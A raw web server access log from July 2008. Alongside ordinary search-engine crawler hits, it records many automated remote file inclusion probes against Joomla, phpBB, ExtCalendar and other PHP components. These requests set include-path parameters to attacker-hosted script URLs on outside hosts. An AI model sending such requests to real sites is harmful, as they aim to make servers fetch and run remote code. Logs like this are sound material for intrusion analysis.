65.55.211.23 - - [13/Jul/2008:11:39:07 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
70.86.29.178 - - [13/Jul/2008:11:39:16 -0700] "GET /administrator/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.111.176.84 - - [13/Jul/2008:11:39:19 -0700] "GET /logs/access_080218.log/index.php?pag=http://www.leokaris.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
38.117.65.239 - - [13/Jul/2008:11:39:30 -0700] "GET /logs/access_071223.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
38.117.65.239 - - [13/Jul/2008:11:39:30 -0700] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
38.117.65.239 - - [13/Jul/2008:11:39:30 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.20.1.30 - - [13/Jul/2008:11:39:30 -0700] "GET /logs/access_080222.log/login.php?svr_rootscript=http://cncteknix.com/portal//components/com_joomlalib/standalone/idfile.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
65.55.211.23 - - [13/Jul/2008:11:39:36 -0700] "GET /blog/index.php/2008/06/?show=slide HTTP/1.1" 200 12066 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
202.164.225.11 - - [13/Jul/2008:11:39:36 -0700] "GET /logs/access_080329.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [13/Jul/2008:11:39:37 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [13/Jul/2008:11:39:37 -0700] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [13/Jul/2008:11:39:37 -0700] "GET /logs/access_080128.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.72.112.158 - - [13/Jul/2008:11:39:48 -0700] "GET /logs/access_071225.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.72.112.158 - - [13/Jul/2008:11:39:48 -0700] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.72.112.158 - - [13/Jul/2008:11:39:48 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
217.114.163.198 - - [13/Jul/2008:11:39:57 -0700] "GET /index.php?option=com_extcalendarhttp://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 200 18461 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.18.246 - - [13/Jul/2008:11:40:17 -0700] "GET /plans/ HTTP/1.0" 200 1095 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.114.163.198 - - [13/Jul/2008:11:40:28 -0700] "GET /logs/access_071225.log/index.php?option=com_extcalendarhttp://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.114.163.198 - - [13/Jul/2008:11:40:32 -0700] "GET /index.php?option=com_extcalendarhttp://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 200 18461 "-" "libwww-perl/5.79" "www.dmulk.com"
217.114.163.198 - - [13/Jul/2008:11:40:32 -0700] "GET /logs/index.php?option=com_extcalendarhttp://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.73.55 - - [13/Jul/2008:11:40:48 -0700] "GET /blog/?nggpage=2&pageid=159&show=slide HTTP/1.1" 200 37859 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
87.101.4.42 - - [13/Jul/2008:11:40:54 -0700] "GET /logs/access_080225.log////////?mosConfig_admin_path=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.128.50.35 - - [13/Jul/2008:11:40:58 -0700] "GET /logs/access_071230.log//index.php?lang=en&cat=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.128.50.35 - - [13/Jul/2008:11:41:03 -0700] "GET /index.php?lang=en&cat=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 200 4911 "-" "libwww-perl/5.805" "www.dmulk.com"
195.128.50.35 - - [13/Jul/2008:11:41:04 -0700] "GET /logs//index.php?lang=en&cat=ftp://81.177.8.194/Upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [13/Jul/2008:11:41:07 -0700] "GET /logs/encapscms_PATH/core/core.php?root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [13/Jul/2008:11:41:07 -0700] "GET /encapscms_PATH/core/core.php?root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
38.117.65.239 - - [13/Jul/2008:11:41:32 -0700] "GET /logs/access_080118.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.214.192.29 - - [13/Jul/2008:11:41:38 -0700] "GET /logs/access_080218.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.29 - - [13/Jul/2008:11:41:38 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.214.192.29 - - [13/Jul/2008:11:41:38 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.85.130.159 - - [13/Jul/2008:11:41:45 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.20.1.30 - - [13/Jul/2008:11:41:54 -0700] "GET /login.php?svr_rootscript=http://cncteknix.com/portal//components/com_joomlalib/standalone/idfile.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
70.86.29.178 - - [13/Jul/2008:11:41:55 -0700] "GET /logs/access_071225.log/administrator/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.29.178 - - [13/Jul/2008:11:41:55 -0700] "GET /administrator/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.29.178 - - [13/Jul/2008:11:41:56 -0700] "GET /logs/administrator/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
81.26.15.73 - - [13/Jul/2008:11:42:01 -0700] "GET /index.php?option=com_joomla-visiteshttp://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 200 18467 "-" "libwww-perl/5.79" "www.dmulk.com"
68.142.212.191 - - [13/Jul/2008:11:42:26 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0004.jpg HTTP/1.0" 200 512676 "-" "Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)" "dmulk.com"
88.214.192.29 - - [13/Jul/2008:11:42:30 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.93.201.102 - - [13/Jul/2008:11:42:39 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.93.201.102 - - [13/Jul/2008:11:42:40 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.93.201.102 - - [13/Jul/2008:11:42:41 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.207.108.27 - - [13/Jul/2008:11:42:54 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.67.119 - - [13/Jul/2008:11:43:07 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.5678cheer.com/help/ioncube/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.101.4.42 - - [13/Jul/2008:11:43:45 -0700] "GET ////////?mosConfig_admin_path=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 200 18417 "-" "libwww-perl/5.79" "www.dmulk.com"
202.164.225.11 - - [13/Jul/2008:11:43:49 -0700] "GET /logs/access_080227.log/index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.206.113.104 - - [13/Jul/2008:11:43:53 -0700] "GET ////////?mosConfig_admin_path=http://wegehaupt-berlin.de/botid.txt? HTTP/1.1" 200 18417 "-" "libwww-perl/5.805" "www.dmulk.com"
216.86.157.145 - - [13/Jul/2008:11:44:05 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://buddiespace.com/mp3/source/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.86.157.145 - - [13/Jul/2008:11:44:05 -0700] "GET /lostpasswd.php?env[include_prefix]=http://buddiespace.com/mp3/source/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.86.157.145 - - [13/Jul/2008:11:44:05 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://buddiespace.com/mp3/source/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.87.117 - - [13/Jul/2008:11:44:24 -0700] "GET /logs//?prefix=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 200 55998 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
210.245.87.117 - - [13/Jul/2008:11:44:25 -0700] "GET //?prefix=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 200 18379 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
216.86.157.145 - - [13/Jul/2008:11:44:50 -0700] "GET /logs/access_080329.log/lostpasswd.php?env[include_prefix]=http://buddiespace.com/mp3/source/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.114.163.198 - - [13/Jul/2008:11:45:22 -0700] "GET /logs/access_080118.log/index.php?option=com_extcalendarhttp://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.196.124.2 - - [13/Jul/2008:11:45:23 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
38.117.65.239 - - [13/Jul/2008:11:45:34 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
38.117.65.239 - - [13/Jul/2008:11:45:34 -0700] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.86.157.145 - - [13/Jul/2008:11:45:47 -0700] "GET /logs/access_080329.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://buddiespace.com/mp3/source/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.86.157.145 - - [13/Jul/2008:11:45:47 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://buddiespace.com/mp3/source/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.86.157.145 - - [13/Jul/2008:11:45:47 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://buddiespace.com/mp3/source/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.86.157.145 - - [13/Jul/2008:11:45:48 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://buddiespace.com/mp3/source/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.22.250 - - [13/Jul/2008:11:46:20 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.iglesialcs.cl/newweb//images/stories/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [13/Jul/2008:11:46:21 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.iglesialcs.cl/newweb//images/stories/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [13/Jul/2008:11:46:23 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.iglesialcs.cl/newweb//images/stories/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.70.36.107 - - [13/Jul/2008:11:46:35 -0700] "GET /logs/access_080329.log/encapscms_PATH/core/core.php?root=http://www.coronaclub.it/pk_gallery/photos/25/11828333/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [13/Jul/2008:11:46:37 -0700] "GET /logs/?REX[INCLUDE_PATH]=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 200 55993 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
210.245.87.117 - - [13/Jul/2008:11:46:38 -0700] "GET /?REX[INCLUDE_PATH]=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 200 18423 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
81.169.139.156 - - [13/Jul/2008:11:46:54 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
210.245.122.3 - - [13/Jul/2008:11:47:04 -0700] "GET /logs/access.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.122.3 - - [13/Jul/2008:11:47:04 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.122.3 - - [13/Jul/2008:11:47:04 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
116.125.113.115 - - [13/Jul/2008:11:47:11 -0700] "GET /errors.php?error=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
116.125.113.115 - - [13/Jul/2008:11:47:12 -0700] "GET /logs/errors.php?error=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.38.22.250 - - [13/Jul/2008:11:47:20 -0700] "GET /logs/access_080226.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.iglesialcs.cl/newweb//images/stories/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.64.177.199 - - [13/Jul/2008:11:47:38 -0700] "GET /index.php?option=com_galleriahttp://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 200 18455 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.29.178 - - [13/Jul/2008:11:47:41 -0700] "GET /logs/access_080110.log/administrator/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.6.22.88 - - [13/Jul/2008:11:47:45 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
81.169.139.156 - - [13/Jul/2008:11:48:02 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.139.156 - - [13/Jul/2008:11:48:03 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
212.117.89.191 - - [13/Jul/2008:11:48:18 -0700] "GET /logs/access_080315.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.139.156 - - [13/Jul/2008:11:48:20 -0700] "GET /logs/access_071218.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.139.156 - - [13/Jul/2008:11:48:20 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
74.6.22.88 - - [13/Jul/2008:11:48:25 -0700] "GET /blog/index.php/2008/06/05/?show=gallery&nggpage=2 HTTP/1.0" 200 27121 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
212.117.89.191 - - [13/Jul/2008:11:48:27 -0700] "GET /logs/access_080313.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.88 - - [13/Jul/2008:11:49:07 -0700] "GET /blog/index.php/2008/06/05/?show=gallery&nggpage=2 HTTP/1.0" 200 27120 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
66.249.73.55 - - [13/Jul/2008:11:49:08 -0700] "GET /blog/?nggpage=3&pageid=17 HTTP/1.1" 200 18296 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
217.151.102.50 - - [13/Jul/2008:11:49:16 -0700] "GET /logs/index.php?canal=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.165.253.62 - - [13/Jul/2008:11:49:20 -0700] "GET //tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
82.165.253.62 - - [13/Jul/2008:11:49:20 -0700] "GET /logs//tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
217.151.102.50 - - [13/Jul/2008:11:49:20 -0700] "GET /index.php?canal=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 200 18411 "-" "libwww-perl/5.805" "www.dmulk.com"
213.223.138.100 - - [13/Jul/2008:11:50:18 -0700] "GET /logs/access_071218.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.223.138.100 - - [13/Jul/2008:11:50:19 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.223.138.100 - - [13/Jul/2008:11:50:20 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.165.253.62 - - [13/Jul/2008:11:50:25 -0700] "GET /logs//modules/horoscope/footer.php?xoopsConfig[root_path]=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
82.165.253.62 - - [13/Jul/2008:11:50:25 -0700] "GET //modules/horoscope/footer.php?xoopsConfig[root_path]=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:11:50:47 -0700] "GET /logs/access_080118.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[CONFIG_PATH]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.92.74.1 - - [13/Jul/2008:11:50:57 -0700] "GET //amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://geocities.com/titit_tuit/tutor/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.6.155.114 - - [13/Jul/2008:11:51:39 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.86.157.145 - - [13/Jul/2008:11:54:21 -0700] "GET /lostpasswd.php?env[include_prefix]=http://buddiespace.com/mp3/source/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.139.226 - - [13/Jul/2008:11:54:40 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.hotelberberys.pl/includes/domit/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [13/Jul/2008:11:54:40 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.hotelberberys.pl/includes/domit/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [13/Jul/2008:11:54:40 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.hotelberberys.pl/includes/domit/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.165.180.214 - - [13/Jul/2008:11:54:45 -0700] "GET /logs/access_071223.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.165.180.214 - - [13/Jul/2008:11:54:45 -0700] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.165.180.214 - - [13/Jul/2008:11:54:45 -0700] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.101.56 - - [13/Jul/2008:11:54:57 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.139.226 - - [13/Jul/2008:11:55:07 -0700] "GET /logs/access_080329.log/lostpasswd.php?env[include_prefix]=http://www.hotelberberys.pl/includes/domit/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.64.177.199 - - [13/Jul/2008:11:55:08 -0700] "GET /logs/access.log/index.php?option=com_galleriahttp://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.64.177.199 - - [13/Jul/2008:11:55:13 -0700] "GET /index.php?option=com_galleriahttp://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 200 18455 "-" "libwww-perl/5.805" "www.dmulk.com"
217.64.177.199 - - [13/Jul/2008:11:55:14 -0700] "GET /logs/index.php?option=com_galleriahttp://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.99.30.20 - - [13/Jul/2008:11:55:17 -0700] "GET /?show=slide&pageid=159 HTTP/1.0" 200 37789 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.dmulk.com"
210.245.122.3 - - [13/Jul/2008:11:55:34 -0700] "GET /logs/access.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.122.3 - - [13/Jul/2008:11:55:34 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
